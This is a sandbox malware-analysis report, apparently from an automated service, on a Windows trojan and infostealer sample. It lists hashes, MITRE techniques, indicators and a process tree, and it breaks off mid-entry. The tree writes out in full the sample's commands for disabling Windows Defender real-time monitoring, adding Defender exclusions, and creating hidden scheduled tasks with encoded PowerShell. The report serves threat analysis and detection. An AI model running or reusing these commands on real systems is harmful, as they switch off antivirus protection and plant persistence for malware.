3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43

Analysis

max time kernel
72s
max time network
204s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
25-04-2024 01:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe
Size

6.6MB
MD5

d1a74dc914c8e798a102056bfbf52714
SHA1

8156de08a9859961e2b50682e356b57dba87f135
SHA256

3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43
SHA512

dcde83622b9f6d525f9a0dc7b12f36e86665761e4dfcf9c778214e11c065a5c6ffb6beefb1f1d4b661be6f0a663630a414596ad14ebfdf69fee597435d90ffcc
SSDEEP

196608:91OU2zjVpYD8vDwJmaHxbS2Os9qP0eEIxaK:3OU2tpRvDqRbhOZ0f+aK

Score

10^/10

evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Executes dropped EXE 2 IoCs

Processes:

Install.exemgAJCNn.exe

pid process

1684 Install.exe
1100 mgAJCNn.exe
Loads dropped DLL 4 IoCs

Processes:

3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exeInstall.exe

pid process

2224 3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe
1684 Install.exe
1684 Install.exe
1684 Install.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
1684	Install.exe
1100	mgAJCNn.exe

pid	process
2224	3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe
1684	Install.exe
1684	Install.exe
1684	Install.exe

Drops file in System32 directory 8 IoCs

Processes:

powershell.exemgAJCNn.exepowershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	mgAJCNn.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	mgAJCNn.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	mgAJCNn.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	mgAJCNn.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bwrroZoeZRoQVpyAcj.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\bwrroZoeZRoQVpyAcj.job	schtasks.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2980	schtasks.exe
1272	schtasks.exe
2012	schtasks.exe
1124	schtasks.exe
1612	schtasks.exe
596	schtasks.exe
2660	schtasks.exe
1292	schtasks.exe
1596	schtasks.exe
2368	schtasks.exe
1956	schtasks.exe
2392	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 7 IoCs

Processes:

mgAJCNn.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	mgAJCNn.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000b0b95647b296da01	mgAJCNn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	mgAJCNn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	mgAJCNn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	mgAJCNn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0c46947b296da01	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exe

pid	process
1160	powershell.exe
2552	powershell.EXE
2552	powershell.EXE
2552	powershell.EXE
1372	powershell.EXE
1372	powershell.EXE
1372	powershell.EXE
2140	powershell.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

powershell.exeWMIC.exepowershell.EXEpowershell.EXEpowershell.exe

description	pid	process
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeIncreaseQuotaPrivilege	2020	WMIC.exe
Token: SeSecurityPrivilege	2020	WMIC.exe
Token: SeTakeOwnershipPrivilege	2020	WMIC.exe
Token: SeLoadDriverPrivilege	2020	WMIC.exe
Token: SeSystemProfilePrivilege	2020	WMIC.exe
Token: SeSystemtimePrivilege	2020	WMIC.exe
Token: SeProfSingleProcessPrivilege	2020	WMIC.exe
Token: SeIncBasePriorityPrivilege	2020	WMIC.exe
Token: SeCreatePagefilePrivilege	2020	WMIC.exe
Token: SeBackupPrivilege	2020	WMIC.exe
Token: SeRestorePrivilege	2020	WMIC.exe
Token: SeShutdownPrivilege	2020	WMIC.exe
Token: SeDebugPrivilege	2020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2020	WMIC.exe
Token: SeRemoteShutdownPrivilege	2020	WMIC.exe
Token: SeUndockPrivilege	2020	WMIC.exe
Token: SeManageVolumePrivilege	2020	WMIC.exe
Token: 33	2020	WMIC.exe
Token: 34	2020	WMIC.exe
Token: 35	2020	WMIC.exe
Token: SeDebugPrivilege	2552	powershell.EXE
Token: SeDebugPrivilege	1372	powershell.EXE
Token: SeDebugPrivilege	2140	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exeInstall.exeforfiles.execmd.exepowershell.exetaskeng.exemgAJCNn.exetaskeng.exepowershell.EXE

description	pid	process	target process
PID 2224 wrote to memory of 1684	2224	3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe	Install.exe
PID 2224 wrote to memory of 1684	2224	3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe	Install.exe
PID 2224 wrote to memory of 1684	2224	3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe	Install.exe
PID 2224 wrote to memory of 1684	2224	3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe	Install.exe
PID 2224 wrote to memory of 1684	2224	3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe	Install.exe
PID 2224 wrote to memory of 1684	2224	3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe	Install.exe
PID 2224 wrote to memory of 1684	2224	3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe	Install.exe
PID 1684 wrote to memory of 1976	1684	Install.exe	forfiles.exe
PID 1684 wrote to memory of 1976	1684	Install.exe	forfiles.exe
PID 1684 wrote to memory of 1976	1684	Install.exe	forfiles.exe
PID 1684 wrote to memory of 1976	1684	Install.exe	forfiles.exe
PID 1684 wrote to memory of 1976	1684	Install.exe	forfiles.exe
PID 1684 wrote to memory of 1976	1684	Install.exe	forfiles.exe
PID 1684 wrote to memory of 1976	1684	Install.exe	forfiles.exe
PID 1976 wrote to memory of 1320	1976	forfiles.exe	reg.exe
PID 1976 wrote to memory of 1320	1976	forfiles.exe	reg.exe
PID 1976 wrote to memory of 1320	1976	forfiles.exe	reg.exe
PID 1976 wrote to memory of 1320	1976	forfiles.exe	reg.exe
PID 1976 wrote to memory of 1320	1976	forfiles.exe	reg.exe
PID 1976 wrote to memory of 1320	1976	forfiles.exe	reg.exe
PID 1976 wrote to memory of 1320	1976	forfiles.exe	reg.exe
PID 1320 wrote to memory of 1160	1320	cmd.exe	conhost.exe
PID 1320 wrote to memory of 1160	1320	cmd.exe	conhost.exe
PID 1320 wrote to memory of 1160	1320	cmd.exe	conhost.exe
PID 1320 wrote to memory of 1160	1320	cmd.exe	conhost.exe
PID 1320 wrote to memory of 1160	1320	cmd.exe	conhost.exe
PID 1320 wrote to memory of 1160	1320	cmd.exe	conhost.exe
PID 1320 wrote to memory of 1160	1320	cmd.exe	conhost.exe
PID 1160 wrote to memory of 2020	1160	powershell.exe	WMIC.exe
PID 1160 wrote to memory of 2020	1160	powershell.exe	WMIC.exe
PID 1160 wrote to memory of 2020	1160	powershell.exe	WMIC.exe
PID 1160 wrote to memory of 2020	1160	powershell.exe	WMIC.exe
PID 1160 wrote to memory of 2020	1160	powershell.exe	WMIC.exe
PID 1160 wrote to memory of 2020	1160	powershell.exe	WMIC.exe
PID 1160 wrote to memory of 2020	1160	powershell.exe	WMIC.exe
PID 1684 wrote to memory of 596	1684	Install.exe	conhost.exe
PID 1684 wrote to memory of 596	1684	Install.exe	conhost.exe
PID 1684 wrote to memory of 596	1684	Install.exe	conhost.exe
PID 1684 wrote to memory of 596	1684	Install.exe	conhost.exe
PID 1684 wrote to memory of 596	1684	Install.exe	conhost.exe
PID 1684 wrote to memory of 596	1684	Install.exe	conhost.exe
PID 1684 wrote to memory of 596	1684	Install.exe	conhost.exe
PID 840 wrote to memory of 1100	840	taskeng.exe	mgAJCNn.exe
PID 840 wrote to memory of 1100	840	taskeng.exe	mgAJCNn.exe
PID 840 wrote to memory of 1100	840	taskeng.exe	mgAJCNn.exe
PID 840 wrote to memory of 1100	840	taskeng.exe	mgAJCNn.exe
PID 1100 wrote to memory of 2660	1100	mgAJCNn.exe	reg.exe
PID 1100 wrote to memory of 2660	1100	mgAJCNn.exe	reg.exe
PID 1100 wrote to memory of 2660	1100	mgAJCNn.exe	reg.exe
PID 1100 wrote to memory of 2660	1100	mgAJCNn.exe	reg.exe
PID 1100 wrote to memory of 2488	1100	mgAJCNn.exe	schtasks.exe
PID 1100 wrote to memory of 2488	1100	mgAJCNn.exe	schtasks.exe
PID 1100 wrote to memory of 2488	1100	mgAJCNn.exe	schtasks.exe
PID 1100 wrote to memory of 2488	1100	mgAJCNn.exe	schtasks.exe
PID 2460 wrote to memory of 2552	2460	taskeng.exe	reg.exe
PID 2460 wrote to memory of 2552	2460	taskeng.exe	reg.exe
PID 2460 wrote to memory of 2552	2460	taskeng.exe	reg.exe
PID 2552 wrote to memory of 2644	2552	powershell.EXE	reg.exe
PID 2552 wrote to memory of 2644	2552	powershell.EXE	reg.exe
PID 2552 wrote to memory of 2644	2552	powershell.EXE	reg.exe
PID 1100 wrote to memory of 2932	1100	mgAJCNn.exe	schtasks.exe
PID 1100 wrote to memory of 2932	1100	mgAJCNn.exe	schtasks.exe
PID 1100 wrote to memory of 2932	1100	mgAJCNn.exe	schtasks.exe
PID 1100 wrote to memory of 2932	1100	mgAJCNn.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe
"C:\Users\Admin\AppData\Local\Temp\3a6e06f69d613fa614e5b56ce56bb70fb1400edb7ecb18885611414646d95e43.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2224

C:\Users\Admin\AppData\Local\Temp\7zS4FF4.tmp\Install.exe
.\Install.exe /pmdidVs "525403" /S
2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
3⤵
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
4⤵
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1160

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 01:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\mgAJCNn.exe\" ZO /kPsite_idGuh 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:596

C:\Windows\system32\taskeng.exe
taskeng.exe {3CC2A4EB-CC23-4467-9974-12BFE8A1D580} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:840

C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\mgAJCNn.exe
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\mgAJCNn.exe ZO /kPsite_idGuh 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gfVrZgCfQ" /SC once /ST 00:36:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:2660

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gfVrZgCfQ"
3⤵
PID:2488

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gfVrZgCfQ"
3⤵
PID:2932

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:3036

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3012

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:3004

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2104

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggYNtJsfQ" /SC once /ST 00:26:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:2980

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggYNtJsfQ"
3⤵
PID:2100

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggYNtJsfQ"
3⤵
PID:2148

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:2052

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:2144

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
PID:2260

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1580

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1692

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2220

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1820

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2152

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1416

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2328

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\heXdjphsLYtTYYrU\xyVhveKX\thsCdlZPKbViygcY.wsf"
3⤵
PID:1564

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\heXdjphsLYtTYYrU\xyVhveKX\thsCdlZPKbViygcY.wsf"
3⤵
PID:2028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1320

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2356

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2660

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2560

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1824

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2104

C:\Windows\SysWOW64\reg.exe
